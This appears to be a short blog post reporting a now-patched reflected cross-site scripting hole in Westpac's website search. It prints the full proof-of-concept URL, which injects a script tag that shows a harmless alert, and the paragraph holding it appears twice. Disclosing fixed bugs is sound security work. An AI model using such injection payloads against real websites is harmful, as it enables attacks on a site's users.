Westpac is so far the only bank I have tested which didn't filter their search field. Needless to say the smell of an xss casualty brings the zombies around..
The hole has been patched by westpac now. The url was:
http://search.westpac.com.au/search/search.cgi?collection=westpac&query=%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32,109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0
The hole has been patched by westpac now. The url was:
http://search.westpac.com.au/search/search.cgi?collection=westpac&query=%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32,109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0
